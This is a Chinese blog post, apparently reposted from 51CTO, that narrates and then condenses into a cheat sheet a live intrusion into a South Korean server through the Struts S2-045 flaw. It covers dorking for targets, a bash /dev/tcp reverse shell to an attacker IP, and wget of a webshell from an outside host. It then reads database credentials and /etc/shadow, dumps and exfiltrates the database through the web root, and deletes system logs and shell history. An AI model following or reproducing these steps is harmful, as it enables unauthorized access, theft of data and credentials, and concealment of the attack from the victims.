利用Strutss02-045漏洞快速渗透韩国某服务器

  1. 云栖社区>
  2. 博客>
  3. 正文

利用Strutss02-045漏洞快速渗透韩国某服务器

科技小能手 2017-11-12 16:07:00 浏览1681
展开阅读全文

Byantian365.com  simeon

Struts s02-045漏洞非常火爆,国内好多网站均是采用这种架构,下面就如何快速获取Linux服务器的权限进行分析和分享,在文章结尾部分高度浓缩渗透linux技巧和方法总结,欢迎大家拍砖!

1.获取URL地址

可以通过百度、zoomeyehttps://www.zoomeye.org/)和shadonhttps://www.shodan.io/)进行搜索,我目前整理了一些关键词:

enterprise.action

register.action

info.action

login.action

index.action

2.存在漏洞检测

还可以根据国家进行收集例如site:kr这是韩国网站你懂的收集到地址后直接在团队小伙伴修改的程序中进行检测如图1所示显示该网站存在漏洞。如果显示不是“Its vulnerable s2_045”则表明该网站已经修护或者不存在漏洞,就果断放弃吧!

                            wKioL1jEtEzxS05RAABMuH1eU2M694.jpg-wh_50

1检测漏洞是否存在

3.获取网站真实物理路径

  获取网站真实路径可以通过locatefindwhereis三个命令来实现,locate命令,前提是前期执行过updatedb命令,如果没有执行则直接执行updatedb命令后再执行。例如“locate *.jsp”可以获取所有的jsp文件名称和路径,如图2所示,会将所有的jsp文件给检索出来。

wKioL1jEtEzwUwa3AAC01IVJ_Qc518.jpg-wh_50

2使用locate命令检索jsp文件

有时候网站的jsp程序太多也无法快速定位,笔者摸索出来一个技巧,就是通过查看网站的独立文件,例如打开网页中的图片等文件,获取其名称后,再通过“locate prd01.jpg”命令来检索,会提高效率,如图3所示,直接减少到4条记录,通过跟网站对比。命令执行结果中可以判断网站正式路径就在下面两个中:

/home/root/ROOT_20160524/resource/images/kor/main/prd01.jpg

/home/root/ROOT_20160923/resource/images/eng/main/prd01.jpg

wKiom1jEtE2SqD4lAACCMHhPFqI492.jpg-wh_50

3使用locate检索图片文件

4.果断反弹shell

   使用bash -i >&/dev/tcp/59.110.xx.xxx/4433 0>&1或者/usr/bin/bash-i >& /dev/tcp/59.110.xx.xxx/4433 0>&1命令执行反弹,反弹IP地址59.110.xx.xxx,端口为4433,注意该IP是独立IP,且能监听4433端口。如图4所示。

wKiom1jEtE2hty10AABU7VgNMLU213.jpg-wh_50

4反弹到shell执行

5.下载Webshell到服务器

   使用命令“wgetO/home/root/ROOT_20160524/resource/images/a.jsphttp://218.1.xx.xx/tklama/1.txt”下载1.txt到目录“/home/root/ROOT_20160524/resource/images”并保存为a.jsp文件,如图5所示。

wKioL1jEtE2yWgUWAADSoQzR6KA975.jpg-wh_50

 

5下载Webshell到服务器

6.获取webshell

    在浏览器中访问http://203.xxx.xxx.xxx:8080/resource/images/a.jsp,如图6所示,顺利成功获取webshell

wKiom1jEtE6yRWeaAADLWdd267g173.jpg-wh_50

6获取Webshell

7.获取网站数据库配置信息

   网站数据库配置信息一般在WEB-INF/classes/db.properties,如图7所示,可以获取该网站所使用的数据库oracle的账号以及密码等信息,后续动作就不展开讨论了。

wKioL1jEtE7DqTFSAABt6iMZwKU150.jpg-wh_50

7获取数据库密码信息

8.渗透总结

1)使用关键字获取urlurl中一定要带有action,例如index.action,收集到的关键字:

enterprise.action

register.action

info.action

login.action

index.action

(2)搜索引擎

杜娘:http://www.baidu.com

zoomeye:https://www.zoomeye.org/

shodan :https://www.shodan.io/

google镜像:https://google.tse.moe/ https://g.hancel.net/

3)反弹监听服务器命令

bash -i>& /dev/tcp/59.110.xx.xxx/4433 0>&1

/usr/bin/bash -i >& /dev/tcp/59.110.xx.xxx/4433 0>&1

4)定位物理真实路径

 locate *.jsp locate logo.jpg

需要寻找网站独立的图片文件,js文件等。

5)下载并保持webshell

wget –O/home/site/antian365.com.jsp  http://218.1.xx.xxx/tklama/1.txt

6)获取密码哈希值

 cat /etc/shadow

7)查看数据库信息

locatedb.properties

locatejdbc*

locateWEB-INF

8)命令行下连接数据库

whereis Mysql

Mysql –hlocalhost–uroot –ppassword

9mysqldump –hlocalhost–uroot –ppassword somedb>somedb.sql

somedb数据导出为somedb.sql

10)压缩文件

tar –zcvfsomedb.tar.gz somedb.sql

/home/www目录下的所有文件打包到tmp目录

tar –zcvf  /tmp/somedb.tar.gz  /home/www/

移动somedb.tar.gz到站点目录/home/www/下:

mv/tmp/somedb.tar.gz /home/www/somedb.tar.gz

下载文件:

http://www.antian365.com/somedb.tar.gz

下载完毕删除文件,切记别乱删除文件。rm –rf文件名,是彻底删除某个文件

rm –rf/home/www/somedb.tar.gz

11)清除日志

rm -rf/var/log/access.log

rm -rf/var/log/wtmp

rm -rf/var/log/lastlog

rm -rf/var/log/secure*

rm -rf/root/.bash_history

rm -rf/root/.mysql_history

history –c

 

 欢迎加入安天365安全技术交流群(51383306)进行技术讨论,无关人员勿进!



 本文转自 simeon2005 51CTO博客,原文链接:http://blog.51cto.com/simeon/1905542

网友评论

登录后评论
0/500
评论
科技小能手
+ 关注